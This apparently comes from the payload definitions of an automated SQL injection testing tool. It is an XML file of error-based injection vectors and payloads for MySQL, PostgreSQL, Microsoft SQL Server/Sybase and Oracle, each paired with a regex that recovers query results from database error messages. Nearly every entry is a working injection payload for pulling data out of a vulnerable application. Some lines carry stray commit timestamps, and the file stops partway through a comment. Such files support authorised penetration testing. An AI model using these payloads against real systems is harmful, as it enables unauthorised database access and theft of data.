<?xml version="1.0" encoding="UTF-8"?>
<root >
<!-- Error-based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->
<test >
<title > MySQL > = 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3,8,9</clause>
<where > 1</where>
<vector > AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request >
<!-- These work as well as ELT(), but are longer (kept commented out for reference)
<payload > AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
<payload > AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
-->
<payload > AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.5</dbms_version>
</details>
</test>
<test >
<!-- This OR variant does not work when injected into an ORDER BY or GROUP BY clause, hence the narrower clause list below -->
<title > MySQL > = 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 3</risk>
<clause > 1,8,9</clause>
<where > 1</where>
<vector > OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request >
<!-- These work as well as ELT(), but are longer (kept commented out for reference)
<payload > OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
<payload > OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
-->
<payload > OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.5</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3,8,9</clause>
<where > 1</where>
<vector > AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request >
<payload > AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.5</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.5 OR error-based - WHERE or HAVING clause (EXP)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 3</risk>
<clause > 1,8,9</clause>
<where > 1</where>
<vector > OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request >
<payload > OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.5</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3,8,9</clause>
<where > 1</where>
<vector > AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>
<request >
<payload > AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.7.8</dbms_version>
</details>
</test>
<test >
<!-- This OR variant does not work when injected into an ORDER BY or GROUP BY clause, hence the narrower clause list below -->
<title > MySQL > = 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)</title>
<stype > 2</stype>
<level > 5</level>
<risk > 3</risk>
<clause > 1,8,9</clause>
<where > 1</where>
<vector > OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>
<request >
<payload > OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.7.8</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
<stype > 2</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,2,3,8,9</clause>
<where > 1</where>
<vector > AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
<request >
<!-- These work as well as ELT(), but are longer (kept commented out for reference)
<payload > AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
<payload > AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
-->
<payload > AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
<stype > 2</stype>
<level > 1</level>
<risk > 3</risk>
<clause > 1,2,3,8,9</clause>
<!-- Although this is an OR payload, keep where at 1: with where 2 it will not work when injecting into an ORDER BY or GROUP BY clause -->
<where > 1</where>
<vector > OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
<request >
<!-- These work as well as ELT(), but are longer (kept commented out for reference)
<payload > OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
<payload > OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
-->
<payload > OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
<stype > 2</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,2,3,8,9</clause>
<where > 1</where>
<vector > AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
<request >
<!-- These work as well as ELT(), but are longer (kept commented out for reference)
<payload > AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
<payload > AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-->
<payload > AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
<stype > 2</stype>
<level > 2</level>
<risk > 3</risk>
<clause > 1,2,3,8,9</clause>
<!-- Although this is an OR payload, keep where at 1: with where 2 it will not work when injecting into an ORDER BY or GROUP BY clause -->
<where > 1</where>
<vector > OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
<request >
<!-- These work as well as ELT(), but are longer (kept commented out for reference)
<payload > OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
<payload > OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-->
<payload > OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>
<stype > 2</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,8,9</clause>
<where > 1</where>
<vector > AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
<request >
<!-- These work as well as ELT(), but are longer (kept commented out for reference)
<payload > AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
<payload > AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
-->
<payload > AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>
<stype > 2</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,2,3,8,9</clause>
<!-- Although this is an OR payload, keep where at 1: with where 2 it will not work when injecting into an ORDER BY or GROUP BY clause -->
<where > 1</where>
<vector > OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
<request >
<!-- These work as well as ELT(), but are longer (kept commented out for reference)
<payload > OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
<payload > OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
-->
<payload > OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
<stype > 2</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,2,3,8,9</clause>
<where > 1</where>
<vector > AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
<request >
<!-- These work as well as ELT(), but are longer (kept commented out for reference)
<payload > AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
<payload > AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
-->
<payload > AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 4.1</dbms_version>
</details>
</test>
<test >
<!-- This OR variant does not work when injected into an ORDER BY or GROUP BY clause, hence the narrower clause list below -->
<title > MySQL > = 4.1 OR error-based - WHERE or HAVING clause (FLOOR)</title>
<stype > 2</stype>
<level > 2</level>
<risk > 3</risk>
<clause > 1,8,9</clause>
<where > 1</where>
<vector > OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
<request >
<!-- These work as well as ELT(), but are longer (kept commented out for reference)
<payload > OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
<payload > OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
-->
<payload > OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 4.1</dbms_version>
</details>
</test>
<!-- The AND form of this payload does not work, so only the OR form is provided; note it needs a trailing comment (see the comment element below) to cut off the rest of the original query -->
<test >
<title > MySQL OR error-based - WHERE or HAVING clause (FLOOR)</title>
<stype > 2</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,8,9</clause>
<where > 2</where>
<vector > OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
<request >
<payload > OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
<comment > #</comment>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > PostgreSQL AND error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,8,9</clause>
<where > 1</where>
<vector > AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request >
<payload > AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<title > PostgreSQL OR error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 1</level>
<risk > 3</risk>
<clause > 1,8,9</clause>
<where > 2</where>
<vector > OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request >
<payload > OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>
<stype > 2</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,8,9</clause>
<where > 1</where>
<vector > AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request >
<payload > AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>
<stype > 2</stype>
<level > 2</level>
<risk > 3</risk>
<clause > 1,8,9</clause>
<where > 2</where>
<vector > OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request >
<payload > OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)</title>
<stype > 2</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,8,9</clause>
<where > 1</where>
<vector > AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request >
<payload > AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)</title>
<stype > 2</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,8,9</clause>
<where > 2</where>
<vector > OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request >
<payload > OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)</title>
<stype > 2</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,8,9</clause>
<where > 1</where>
<vector > AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector>
<request >
<payload > AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)</title>
<stype > 2</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,8,9</clause>
<where > 2</where>
<vector > OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector>
<request >
<payload > OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>
<stype > 2</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,9</clause>
<where > 1</where>
<vector > AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request >
<payload > AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
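<test >
<title > Oracle OR error-based - WHERE or HAVING clause (XMLType)</title>
<stype > 2</stype>
<level > 1</level>
<risk > 3</risk>
<clause > 1,9</clause>
<where > 2</where>
<!-- The REPLACE chain must stay identical to the AND variant of this test: space, '$', '@' AND '#' are all substituted before the value is fed to XMLType, so both vectors return the [QUERY] output inside the same delimiters. The '#' substitution was missing here. -->
<vector > OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request >
<payload > OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>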
<test >
<title > Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
<level > 2</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-02-20 21:34:47 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<payload > AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > Oracle</dbms>
<dbms_version > > = 8.1.6</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
<!--
Oracle, OR variant of the UTL_INADDR.GET_HOST_ADDRESS() technique: the failed host-name
resolution of the delimited value raises an error that echoes it. Same caveats as the
AND form: a DNS lookup for the value leaves the database host, and on 11g+ a network
